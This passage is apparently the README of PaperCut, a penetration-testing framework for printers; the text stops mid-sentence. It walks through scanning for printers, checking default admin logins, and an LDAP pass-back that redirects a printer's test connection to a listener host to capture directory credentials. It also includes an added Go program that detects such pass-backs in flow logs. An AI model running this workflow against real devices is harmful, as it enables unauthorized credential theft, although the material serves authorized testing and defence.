PaperCut
Printer exploitation framework for penetration testing. Discovers printers via PJL scanning, checks for default credentials, and extracts stored credentials through pass-back attacks and protocol-level exploits.
The framework and core modules are complete, but community support is needed to expand coverage since writing and testing modules requires access to the actual devices. Please give it a star to help increase visibility for potential module contributions!
[ASCII-art banner: PaperCut, Printer Exploitation Framework, #Waffl3ss v0.7]

```text
Type 'help' for available commands. Tab completion is available.
PaperCut > workspace create DEMO
[+] Workspace "DEMO" created and set as active
PaperCut [DEMO] > scan -t 10.0.0.10
[*] Scanning 1 target(s) with 20 workers (timeout: 2s)
[+] 10.0.0.10 -- RICOH MP C3004 (Ricoh)
[*] Scan complete. Found 1 printer(s) out of 1 target(s).
PaperCut [DEMO] > use ricoh/ldap/passback
[*] Using module: ricoh/ldap/passback
[*] RICOH LDAP Pass-Back - redirects LDAP test connection to capture bind credentials
[*] Category: SAFE | Manufacturer: Ricoh
[*] Models: MP C3003, MP C4503, MP C6003
PaperCut [DEMO] (ricoh/ldap/passback) SAFE >
```
Legal Disclaimer: PaperCut is designed for authorized security testing and educational purposes only. Only use this tool against systems you own or have explicit written authorization to test. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse of this software.
Table of Contents
- Installation
- Quick Start
- Usage
- Modules
- Scanner
- Proxy Support
- Scanning Large Networks
- Credential Storage
- Writing New Modules
- License
Installation
Requires Go 1.24+.
```bash
git clone https://github.com/waffl3ss/PaperCut.git
cd PaperCut

# Build for current OS
make build

# Build for specific platforms
make linux       # papercut_linux
make windows     # papercut_windows.exe
make darwin      # papercut_darwin (amd64)
make darwin-arm  # papercut_darwin_arm64 (Apple Silicon)

# Build all platforms
make all
```
Quick Start
```text
# Launch interactive shell
./papercut

# Create a workspace and scan a network
papercut > workspace create engagement1
papercut [engagement1] > scan -t 10.0.0.0/24

# View results and search for modules
papercut [engagement1] > results
papercut [engagement1] > search ricoh

# Select a module and exploit
papercut [engagement1] > use 1
papercut [engagement1] (ricoh/ldap/passback) > set TARGET 1
papercut [engagement1] (ricoh/ldap/passback) > set LHOST 10.0.0.100
papercut [engagement1] (ricoh/ldap/passback) > check
papercut [engagement1] (ricoh/ldap/passback) > run

# View captured credentials
papercut [engagement1] > creds
```
Usage
Interactive Mode
```bash
./papercut
```
Launches the interactive shell with tab completion, command history, and a Metasploit-style workflow.
```text
papercut > workspace create engagement1
[+] Workspace "engagement1" created and set as active
papercut [engagement1] > scan -t 10.0.0.0/24
[*] Scanning 254 target(s) with 20 workers (timeout: 2s)
[+] 10.0.0.5 -- RICOH MP C3004 (Ricoh)
[+] 10.0.0.12 -- HP LaserJet Pro M404dn (HP)
[+] 10.0.0.20 -- Sharp MX-2640N (Sharp)
papercut [engagement1] > results
papercut [engagement1] > results --manufacturer ricoh
papercut [engagement1] > search ricoh
papercut [engagement1] > set threads 100
papercut [engagement1] > show
```
Module Workflow
Select a module, configure options, then check credentials or run the exploit:
```text
papercut [engagement1] > search ricoh
╭───┬──────────────────────┬──────────┬──────────────┬─────────────────────┬──────────────────────╮
│ # │ Name                 │ Category │ Manufacturer │ Models              │ Description          │
├───┼──────────────────────┼──────────┼──────────────┼─────────────────────┼──────────────────────┤
│ 1 │ ricoh/ldap/passback  │ SAFE     │ Ricoh        │ MP C3003, MP C4503  │ RICOH LDAP Pass-Back │
╰───┴──────────────────────┴──────────┴──────────────┴─────────────────────┴──────────────────────╯
papercut [engagement1] > use 1
[*] Using module: ricoh/ldap/passback
papercut [engagement1] (ricoh/ldap/passback) > options
╭──────────┬─────────┬──────────┬────────────────────────────────────╮
│ NAME     │ CURRENT │ REQUIRED │ DESCRIPTION                        │
├──────────┼─────────┼──────────┼────────────────────────────────────┤
│ RHOST    │         │ yes      │ Target IP address                  │
│ RPORT    │ 80      │ no       │ Target HTTP port                   │
│ LHOST    │         │ yes      │ Listening IP for LDAP callback     │
│ LPORT    │ 389     │ no       │ Listening port for LDAP callback   │
│ USERNAME │ admin   │ no       │ Login username                     │
│ PASSWORD │         │ no       │ Login password (empty for default) │
│ SSL      │ false   │ no       │ Use HTTPS                          │
│ VERBOSE  │ false   │ no       │ Verbose output                     │
│ TIMEOUT  │ 120     │ no       │ Callback timeout in seconds        │
│ PROXY    │         │ no       │ Proxy (overrides global)           │
╰──────────┴─────────┴──────────┴────────────────────────────────────╯
papercut [engagement1] (ricoh/ldap/passback) > set TARGET 1
[*] TARGET 1 => 10.0.0.5 (Ricoh RICOH MP C3004)
papercut [engagement1] (ricoh/ldap/passback) > set LHOST 10.0.0.100
papercut [engagement1] (ricoh/ldap/passback) > check
[*] Checking default credentials on 10.0.0.5:80...
[+] Default credentials valid: admin/(empty)
papercut [engagement1] (ricoh/ldap/passback) > run
[*] Logging into 10.0.0.5:80 as admin...
[+] Login successful
[*] Extracting LDAP configuration...
[*] Starting LDAP listener on 10.0.0.100:389...
[*] Redirecting LDAP test to 10.0.0.100:389...
[*] Waiting for callback (timeout: 120s)...
[+] Received LDAP bind from 10.0.0.5
[+] Username: cn=ldap_user,dc=corp,dc=local
[+] Password: LdapP@ssw0rd!
papercut [engagement1] (ricoh/ldap/passback) > back
```
When a module is active:
- UPPERCASE option names set module options: `set RHOST 10.0.0.5`
- lowercase option names set global settings: `set threads 50`
- `set TARGET <n>` fills RHOST from the scan results table row number
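The pass-back in the session above succeeds because the printer's LDAP "test connection" binds, with its stored credentials, to whatever server address the admin interface has been told to use. For a defender that makes the technique visible in ordinary network flow data: an inventoried printer opening an LDAP-port connection to anything other than the approved directory servers. The Go program below is an added example and not part of PaperCut; it parses a constructed `src=... dst=... dport=...` flow-log format (assumed, not any vendor's), applies a constructed asset inventory, and flags exactly that pattern. The addresses mirror the session above, with 10.0.0.1 standing in for the legitimate directory server.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Flow is one parsed connection record from the constructed log format below.
type Flow struct {
	Time, Src, Dst string
	Dport          int
}

// Alert is one LDAP-port connection from a printer to a non-directory host.
type Alert struct {
	Time, Printer, Dst string
	Dport              int
}

// Inventory is the defender's asset knowledge: which addresses are printers
// and which directory servers those printers are allowed to bind to.
type Inventory struct {
	Printers    map[string]bool
	LDAPServers map[string]bool
}

// ldapPorts covers plain LDAP, LDAPS and the AD global-catalog ports.
var ldapPorts = map[int]bool{389: true, 636: true, 3268: true, 3269: true}

// parseFlow reads one line of the constructed format
//   <timestamp> flow src=<ip> dst=<ip> dport=<port> proto=<tcp|udp>
// and reports false for lines that are malformed or missing a field.
func parseFlow(line string) (Flow, bool) {
	fields := strings.Fields(line)
	if len(fields) < 2 || fields[1] != "flow" {
		return Flow{}, false
	}
	f := Flow{Time: fields[0]}
	for _, kv := range fields[2:] {
		key, val, ok := strings.Cut(kv, "=")
		if !ok {
			continue
		}
		switch key {
		case "src":
			f.Src = val
		case "dst":
			f.Dst = val
		case "dport":
			f.Dport, _ = strconv.Atoi(val)
		}
	}
	return f, f.Src != "" && f.Dst != "" && f.Dport != 0
}

// DetectPassback flags every LDAP-port connection whose source is an
// inventoried printer and whose destination is not an approved directory
// server. A redirected "test connection" lands on the listener host, so the
// bind shows up in flow data as exactly this pattern; binds to the real
// directory servers are left alone.
func DetectPassback(lines []string, inv Inventory) []Alert {
	var alerts []Alert
	for _, line := range lines {
		f, ok := parseFlow(line)
		if !ok || !inv.Printers[f.Src] || !ldapPorts[f.Dport] || inv.LDAPServers[f.Dst] {
			continue
		}
		alerts = append(alerts, Alert{Time: f.Time, Printer: f.Src, Dst: f.Dst, Dport: f.Dport})
	}
	return alerts
}

// SampleInventory and SampleFlows are constructed data: 10.0.0.1 plays the
// legitimate directory server, 10.0.0.100 the listener host from the session.
var SampleInventory = Inventory{
	Printers:    map[string]bool{"10.0.0.5": true, "10.0.0.12": true, "10.0.0.20": true},
	LDAPServers: map[string]bool{"10.0.0.1": true},
}

var SampleFlows = []string{
	"2024-05-01T09:00:01Z flow src=10.0.0.5 dst=10.0.0.1 dport=389 proto=tcp",    // normal bind to the directory
	"2024-05-01T09:02:14Z flow src=10.0.0.50 dst=10.0.0.100 dport=389 proto=tcp", // workstation, not a printer
	"2024-05-01T09:05:37Z flow src=10.0.0.5 dst=10.0.0.100 dport=389 proto=tcp",  // redirected test connection
	"2024-05-01T09:05:40Z flow src=10.0.0.5 dst=10.0.0.100 dport=80 proto=tcp",   // not an LDAP port
	"2024-05-01T09:07:02Z flow src=10.0.0.12 dst=10.0.0.100 dport=636 proto=tcp", // LDAPS variant
	"garbage line that does not parse",
}

func main() {
	for _, a := range DetectPassback(SampleFlows, SampleInventory) {
		fmt.Printf("[!] %s printer %s bound LDAP to %s:%d (not an approved directory server)\n",
			a.Time, a.Printer, a.Dst, a.Dport)
	}
}
```

In a real deployment the lines would come from the firewall or NetFlow collector, and the allowlist from the same source of truth that configures the printers' LDAP settings; the check pairs naturally with an alert on admin-interface logins to printers over plain HTTP with the default account, which is the step the module takes before it redirects the LDAP test.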
One-Shot CLI Mode
Most commands also work as direct CLI invocations with flags. The interactive shell is the primary interface and is more thoroughly tested; one-shot mode is provided as a convenience but may not cover all workflows.

```bash
./papercut scan -t 10.0.0.0/24 -w engagement1
./papercut check -t 10.0.0.5 -m ricoh/ldap/passback -w engagement1
./papercut results -w engagement1
```
Target Input Formats
The -t flag accepts:
- Single IP: `10.0.0.1`
- CIDR notation: `10.0.0.0/24`, `172.16.0.0/16`, `10.0.0.0/8`
- File: path to a text file with one target per line (supports IPs, CIDRs, and hostnames)
- Hostname: `printer.corp.local`
Interactive Commands
| Command | Description |
|---|---|
| scan -t <target> | Scan targets via PJL on port 9100 |
| search <term> | Search modules (case-insensitive, searches name/description/manufacturer/models) |
| use <module\|number> | Select a module by name or search result number |
| options | Show options for the active module |
| set <OPTION> <value> | Set module option (when module active) |
| set TARGET <n> | Set RHOST from results table row number |
| check | Test default credentials (module context) |
| run | Execute the active module's exploit |
| back | Deselect the current module |
| results | Show scan results for active workspace |
| results --manufacturer <name> | Filter results by manufacturer |
| results -c | Show only hosts with confirmed default credentials |
| creds | Show captured credentials from exploits |
| workspace create <name> | Create a new workspace |
| workspace use <name> | Switch to a workspace |
| workspace list | List all workspaces |
| workspace delete <name> | Delete a workspace and its data |
| workspace info | Show active workspace details |
| set <option> <value> | Set global: threads, timeout, rate, proxy |
| show | Show current global settings |
| banner | Display the banner |
| clear | Clear the screen |
| help | Show help |
| exit / quit | Exit |
Settings
| Option | Default | Description |
|---|---|---|
| threads | 20 | Number of concurrent worker goroutines |
| timeout | 2s | TCP connection timeout per host |
| rate | 0 (unlimited) | Max new connections per second |
| proxy | (none) | SOCKS proxy for connections (socks5://host:port) |
Modules
Modules are categorized as SAFE or UNSAFE:
- SAFE - Restores the device to its original state after execution. Read-only extraction, test connections, and temporary config changes that are reverted.
- UNSAFE - May leave changes on the device. Settings are modified during exploitation and restored on a best-effort basis.
Each module has two phases:
- Check - Tests for default credentials or vulnerable c
